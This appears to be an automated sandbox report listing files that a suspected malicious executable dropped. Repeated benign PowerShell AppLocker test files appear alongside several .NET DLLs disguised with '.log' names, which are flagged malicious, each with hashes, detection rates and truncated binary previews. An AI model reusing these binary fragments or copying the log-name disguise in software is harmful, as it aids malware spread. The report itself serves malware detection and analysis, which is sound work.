                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tiwjrmkm.fd0.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkc2z23r.oum.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uftro3es.toi.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upnpa31g.gyc.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ut3rsgi4.wpn.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyojdsdr.wqo.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vm0nylld.bok.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1otmi0w.sri.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4giaiv5.2e4.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdzyroup.kdy.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkdw1mj3.tns.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yv0oy15b.zq5.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1imi1hz.dwg.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkpzrbik.xnl.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\Desktop\9dd84b00dff1a7

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with very long lines (896), with no line terminators
                                              Category:dropped
                                              Size (bytes):896
                                              Entropy (8bit):5.899511606503722
                                              Encrypted:false
                                              SSDEEP:24:YGGBH48/uxg3Xb2AAvu6JUQtyJ5wVclMhSeHB34IN2x:YzTGxg3XiAApA3wV7hZRNW
                                              MD5:B6426F20616AAB83B4DB8E750876EC80
                                              SHA1:D016AABCB2E0D319DCCED2ACA38FF52E565BDA75
                                              SHA-256:86029761064CC39B8A3437D908BF8ECA61153D0837246035342A582B95CDA774
                                              SHA-512:B6B89C82D7CE3B965731406E897CB9D3573759A7E9E58F9F37E97AAB317E90B49240F0F30435CCB646260050395A66EA7F8844E44939DFB917E17EE5E0998D0A
                                              Malicious:false
                                              Preview:xlCZg2BvXvckkujqROzPbhyNqilSVqG3oQp9sA7N8NGmHfPW9FLqxNbQxzs7Qtaqoi5UFk7QQmQNaMGLSOSPfaFbyYM2R96OxZ7ij5RZH4ZL6O0lthoCbKKNcefqYE8QqBaAOhlX63IlB4ekikJuU3xnPtFFZlAC5Ie5yzWL5RGhBjMh94Hx5O5xNwvebg7U3Gp2ajwtO7zDwQlpghFeeNGrMqrBD1uYTwo53UHZIXj8Y2B7LG83ac0p98pt1vqWMauAmpvMaqWHoISUpuz630806855oYhXqMv7HAVfUvduGsB0pUDH5tdVc4Ent0iCI8abXVNpZTmHXNtN7FQTUac7tZfN6rvdNamHSkdUHYslHV8OK1qokOsrgds80AtriI47ll4Xl5L5r0zYaQCEBH39s4kz1edHpAD8aBmi6TCoCwAqnThj7oqaP5OrBFfHbEQrx17ZndIrEP6644Li74JBUmtfw5h1y5M8fS3wVH5eg8W99RxG36Kh4PXKHcns5Q3IC7alBZMz8pfVPtfeHb71voDQ5so3eNiPFN7B1MFduUiPuB4Y6IleTCXX3KpSvTVvGPQCwen5WdGbGyg3yQ6WlE5C0jHqgwsb9xIev2lbepHz56RFovefW8JCUNLMX6YjvpbSqBI5oe166GH4RCCuRNFAnGKhqYEhRiDPe9Ymnj01HNFNFR4V4oShkbok1kOPaUoYC2aSnaHsWN3aA6cZdtnmPgpCUyvCUlbwirKN0mrdhjKWiOj4IyvrqCIgMX8zpEXvwG2TwOj1BJFqVSeGO04gztFgioAdo1ydLYkbVPI3P3ph6cL421kyJ16CAVvIOGNJUme6sDu8sBQ5EijGcGkwRATTcha9eApJqfMU7OLzGmFIlB8cwopHfb2T

                                              C:\Users\user\Desktop\HnmxfGsC.log

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):85504
                                              Entropy (8bit):5.8769270258874755
                                              Encrypted:false
                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                              MD5:E9CE850DB4350471A62CC24ACB83E859
                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 71%
                                              Joe Sandbox View:
                                              • Filename: eRZQCpMb4y.exe, Detection: malicious, Browse
                                              • Filename: 4BJoBHQ6T3.exe, Detection: malicious, Browse
                                              • Filename: oG6R4bo1Rd.exe, Detection: malicious, Browse
                                              • Filename: PCCooker2.0_x64.exe, Detection: malicious, Browse
                                              • Filename: kQ6mFXrgYq.exe, Detection: malicious, Browse
                                              • Filename: kIdT4m0aa4.exe, Detection: malicious, Browse
                                              • Filename: 7buiOqC9uM.exe, Detection: malicious, Browse
                                              • Filename: PQmAnagsLM.exe, Detection: malicious, Browse
                                              • Filename: BN57miasVe.exe, Detection: malicious, Browse
                                              • Filename: 5R28W1PAnS.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                              C:\Users\user\Desktop\MaEvHCHq.log

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):23552
                                              Entropy (8bit):5.519109060441589
                                              Encrypted:false
                                              SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                              MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                              SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                              SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                              SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 8%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                              C:\Users\user\Desktop\WJYLrfNX.log

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):9728
                                              Entropy (8bit):5.0168086460579095
                                              Encrypted:false
                                              SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                              MD5:69546E20149FE5633BCBA413DC3DC964
                                              SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                              SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                              SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 4%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                              C:\Users\user\Desktop\fsrbbHSF.log

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):23552
                                              Entropy (8bit):5.529329139831718
                                              Encrypted:false
                                              SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                              MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                              SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                              SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                              SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 3%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                              C:\Users\user\Desktop\oWARLBim.log

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):5.645950918301459
                                              Encrypted:false
                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 17%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                              C:\Users\user\Desktop\yEThvdnU.log

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):69632
                                              Entropy (8bit):5.932541123129161
                                              Encrypted:false
                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 17%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                              C:\Users\user\Desktop\ynMPgItS.log

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):32256
                                              Entropy (8bit):5.631194486392901
                                              Encrypted:false
                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 29%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                              C:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:MSVC .res
                                              Category:dropped
                                              Size (bytes):1224
                                              Entropy (8bit):4.435108676655666
                                              Encrypted:false
                                              SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                              MD5:931E1E72E561761F8A74F57989D1EA0A
                                              SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                              SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                              SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                              Malicious:false
